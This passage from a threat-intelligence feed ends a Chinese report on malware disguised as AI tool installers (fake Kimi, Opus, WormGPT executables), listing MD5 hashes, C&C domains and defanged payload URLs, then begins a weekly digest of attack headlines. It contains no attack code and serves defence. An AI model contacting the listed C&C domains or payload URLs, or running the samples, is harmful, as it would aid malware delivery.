100%;"><p><span leaf="">2026-04-27 12:21:56 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Hermes-Agent_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">347980085c8926d5a1ff8e15a31fd812</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-29 09:19:34 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Hermes-Agent_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">46917d8326d77e4e3c39cb843dbfc675</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-27 12:40:09 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">KawaiiGPT_x64.cpl.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">b6f77b48223f57c67f00ccd8ab3d047e</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-29 09:50:26 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">KawaiiGPT_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">8dde7a417130ae78a3f2aeed1f5b8f58</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-27 13:50:42 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Kimi-K2.6_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">4c7abc81b308fc874ec0de4f026db260</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-29 09:21:03 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Kimi-K2.6_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">48dd212fae0086822d4ae7696cc61693</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-27 11:51:02 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">LTX-2.3_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">faa5f780fb0e0786dd1a2bd19af290ca</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-27 12:34:44 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">opus-4-7_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">6721f30d84f58532d877f2b31bfc9162</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-29 09:25:41 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">opus-4-7_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">a9d492ab22400257f756f0308e06f04c</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-29 08:32:28 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">worldmonitor_x64.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">d0a92b090279894f4628bc3d627fbde0</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-29 09:56:46 UTC</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">WormGPT_x64.exe</span></p></td></tr></tbody></table><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">总结</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">从OpenClaw到DeepSeek TUI，以及其他不断占据话题热榜的AI产品，恶意软件也追逐热点，不断改头换面。通过样本特征关联，我们发现这些恶意软件背后疑似存在着同一个持续活动的攻击团伙，不断借助AI话题发起攻击。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">目前，基于奇安信威胁情报中心的威胁情报数据的全线产品，包括奇安信威胁情报平台（TIP）、天擎、天眼高级威胁检测系统、奇安信NGSOC、奇安信态势感知等，都已经支持对此类攻击的精确检测。</span></p><p nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5325" data-type="jpeg" data-w="800" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100034997" src="https://wechat2rss.xlab.app/img-proxy/?k=49a7dec4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOq81icUQj7U88QH9Q6icAt4LuznzGjiaA7QHSv0zooPR0nPucy6oyzmxYiaTqTIGKScua22NKeToW2NaibNlhk9lP7qlxCBdYRo19Mro%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">IOC</span></h2><p><span leaf=""><span textstyle="" style="font-weight: bold;">MD5</span></span></p><p><span leaf="">b96c0d609c1b7e74f8cb1442bf0b5418</span></p><p><span leaf="">7de2896e373342e0f3b765c855bf7396</span></p><p><span leaf="">78c11c45c00a9c22f537c59a472beca1</span></p><p><span leaf="">df36a31148d2c6414bdafeab771ea728</span></p><p><span leaf="">14920c9751d20452a1006d20b8e73234</span></p><p><span leaf="">f6d328422e7ca22e70a6aa71315450f3</span></p><p><span leaf="">86c7f2a3c307928daaca7c1df3ea5d72</span></p><p><span leaf="">dbaa133fd3d1a834460206d83b480f80</span></p><p><span leaf="">22c0c7d441fd22432cfe7854b59ba82b</span></p><p><span leaf="">a224f44bdac16250d8093df68e05b512</span></p><p><span leaf="">6861fa47889e0340ab7efaab448c56b6</span></p><p><span leaf="">437e4bdb12d7fa8d1c9a9e9db84b8726</span></p><p><span leaf="">fbfe7513685913e6f878647eec429d45</span></p><p><span leaf="">562d48524313d414b5a419fed6ca10aa</span></p><p><span leaf="">df8a2e7aa46af996bdf67d79601671c3</span></p><p><span leaf="">f101a346502a324320f952d39e217064</span></p><p><span leaf="">5d14461718b74b86fdd68c6aee801dc4</span></p><p><span leaf="">556b35236eeb111b0606d88a7aa3fd87</span></p><p><span leaf="">ff371b43786cbb87dab325ce17cf8b7c</span></p><p><span leaf="">1bd1df4f228ecd29a9b6fab48beaa366</span></p><p><span leaf="">975bd8eb56716adbcadb5216592a17c7</span></p><p><span leaf="">347980085c8926d5a1ff8e15a31fd812</span></p><p><span leaf="">46917d8326d77e4e3c39cb843dbfc675</span></p><p><span leaf="">b6f77b48223f57c67f00ccd8ab3d047e</span></p><p><span leaf="">8dde7a417130ae78a3f2aeed1f5b8f58</span></p><p><span leaf="">4c7abc81b308fc874ec0de4f026db260</span></p><p><span leaf="">48dd212fae0086822d4ae7696cc61693</span></p><p><span leaf="">faa5f780fb0e0786dd1a2bd19af290ca</span></p><p><span leaf="">6721f30d84f58532d877f2b31bfc9162</span></p><p><span leaf="">a9d492ab22400257f756f0308e06f04c</span></p><p><span leaf="">d0a92b090279894f4628bc3d627fbde0</span></p><p><span leaf="">(二阶段组件)</span></p><p><span leaf="">397405106d895815a9bef8d84445af5a (OneSync.exe)</span></p><p><span leaf="">b7a76b82c2a5e16a3c346cc6aa145556 (WinHealhCare.exe)</span></p><p><span leaf="">f01e96a80f92c414dd824aef5a1ac1e7 (onedrive_sync.exe)</span></p><p><span leaf="">ecb3e753b60cc0f3d7de50fe7f133e49 (svc_service.exe)</span></p><p><span leaf="">68ba5a1bafae7db35e2eee7ea3f11882 (autodate.exe)</span></p><p><span leaf="">e102797eb4225a93eaeeaa6b9979716a (vicloud.exe)</span></p><p><span leaf=""><span textstyle="" style="font-weight: bold;">C&amp;C</span></span></p><p><span leaf="">mikolirentryifosttry.info</span></p><p><span leaf="">zkevopenanu.cfd</span></p><p><span leaf=""><span textstyle="" style="font-weight: bold;">URL</span></span></p><p><span leaf="">hxxps://pastebin.com/raw/w6BVFFWQ</span></p><p><span leaf="">hxxps://pastebin.com/raw/5tmHDYrf</span></p><p><span leaf="">hxxps://pastebin.com/raw/M6KthA5Z</span></p><p><span leaf="">hxxps://snippet.host/beuskq/raw</span></p><p><span leaf="">hxxps://snippet.host/uikosx/raw</span></p><p><span leaf="">hxxps://hkdk.events/djbk1i9hp0sqoh</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">参考链接</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><a href="https://mp.weixin.qq.com/s/jNYCA9G1jSkevgPWv4Ov_Q" target="_blank">https://mp.weixin.qq.com/s/jNYCA9G1jSkevgPWv4Ov_Q</a></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><a href="https://www.netskope.com/blog/openclaw-hologram-fake-installer-ships-rust-infostealer" target="_blank">https://www.netskope.com/blog/openclaw-hologram-fake-installer-ships-rust-infostealer</a></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://ti.qianxin.com/">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=dfbdedb7&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2MDc2MDA4OA%3D%3D%26mid%3D2247518651%26idx%3D1%26sn%3D08ac9790bae6de954481639889be019b">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sat, 09 May 2026 13:12:00 +0800</pubDate>
    </item>
    <item>
      <title>每周高级威胁情报解读(2026.05.01~05.07)</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247518627&amp;idx=1&amp;sn=b29e952bd2d03588db5aab224debf1a7</link>
      <description>Silver Fox 利用新的 ABCDoor 后门攻击俄罗斯和印度；ScarCruft 通过供应链攻击破坏游戏平台；OceanLotus 被怀疑使用 PyPI 传播 ZiChatBot 恶意软件；研究发现 MuddyWater 与一起Chaos勒索软件攻击有关</description>
      <content:encoded><![CDATA[<p><span>威胁情报中心</span> <span>2026-05-08 10:30</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=0cfed682&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOqicvWGVghdensId4iaEmFotOj7ACUgvficicGiakduqgzwlvqkO6O7pjZ9vozmUwlW13BDVlLHGQDs0eHibr71erxeYMrfurmI5KMWUs%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>Silver Fox 利用新的 ABCDoor 后门攻击俄罗斯和印度；ScarCruft 通过供应链攻击破坏游戏平台；OceanLotus 被怀疑使用 PyPI 传播 ZiChatBot 恶意软件；研究发现 MuddyWater 与一起Chaos勒索软件攻击有关</p>
  <div style="font-size: 15px;letter-spacing: 1px;line-height: 1.75;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="margin-top: 10px;margin-bottom: 10px;text-align: left;box-sizing: border-box;"><p style="display: inline-block;box-sizing: border-box;"><span style="display: block;padding: 0.3em 0.5em;border-radius: 0.8em 0.8em 0px 0px;background-color: rgb(55, 113, 187);color: rgb(255, 255, 255);box-sizing: border-box;" title=""><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026.05.01~05.07</span></p></span></p><div style="border: 1px solid rgb(55, 113, 187);border-radius: 0px 0px 0.8em 0.8em;padding: 10px;box-sizing: border-box;"><div style="line-height: 1.75;text-align: justify;font-size: 14px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击团伙情报</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Silver Fox 利用新的 ABCDoor 后门攻击俄罗斯和印度</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">ScarCruft 通过供应链攻击破坏游戏平台</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">OceanLotus 被怀疑使用 PyPI 传播 ZiChatBot 恶意软件</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">研究发现 MuddyWater 与一起Chaos勒索软件攻击有关</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击行动或事件情报</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Operation Silent Rotor 在莫斯科峰会前夕针对无人机行业进行攻击</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">东南亚军事实体成为 cPanel(CVE-2026-41940) 攻击目标</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">恶意 Intercom PHP 包通过 Composer 插件向 Packagist 传播</span><span leaf="">Mini</span><span leaf=""> Shai-Hulud 攻击</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">钓鱼活动滥用受信任的谷歌服务劫持数万个 Facebook 帐户</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">新型网络钓鱼活动瞄准美国窃取凭证</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">DAEMON Tools软件感染自2026年4月8日起持续进行</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">恶意代码情报</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">人工智能驱动的一体化网络钓鱼工具包Bluekit</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CloudZ RAT 利用 Pheno 插件窃取 OTP 消息</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">恶意 OpenClaw 技能分发 Remcos RAT 和 GhostLoader</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">InstallFix 攻击活动利用伪造的 Claude AI 安装页面诱骗用户运行恶意软件</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞情报</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2026-31431：复制失败漏洞允许跨云环境提升 Linux root 权限</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Android ADB over TCP 认证路径中存在严重无交互远程代码执行漏洞</span></p></li></ul></div></div></div><div style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin: 10px 0% 20px;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: stretch;padding: 0px 10px;border-style: solid;border-width: 0px;border-color: rgb(62, 62, 62);box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 0px 0% -9px;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0%;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034950" src="https://wechat2rss.xlab.app/img-proxy/?k=83bfc9a1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOqicziaicel7EOdCOf2Rv5sVEqvyiaU1QuU1A4EMnwrN1Bybs2BwzSDlXe8PMNN49TRstUbcQ2MhLUyd4RErfNc1k8xH9ibn1eJ5tmbg%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034958" src="https://wechat2rss.xlab.app/img-proxy/?k=2b8bea3f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOq9rRucXQkt037k1Unh30mhjhlUpU0ibdvMv8kGOpdJhl8ZZP823wN7R4c2Qsia79yf3VJbD3BlDxM18ic7gN1FzsRC9JlP2RMdWAE%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0%;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;flex: 100 100 0%;align-self: flex-start;height: auto;z-index: 2;margin: 0px;padding: 3px 6px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(55, 113, 187);line-height: 1.8;letter-spacing: 1.8px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击团伙情报</span></strong></p></div></div></div><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: -10px 0% 0px;transform: rotateX(180deg);-webkit-transform: rotateX(180deg);-moz-transform: rotateX(180deg);-o-transform: rotateX(180deg);justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0% 1px;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 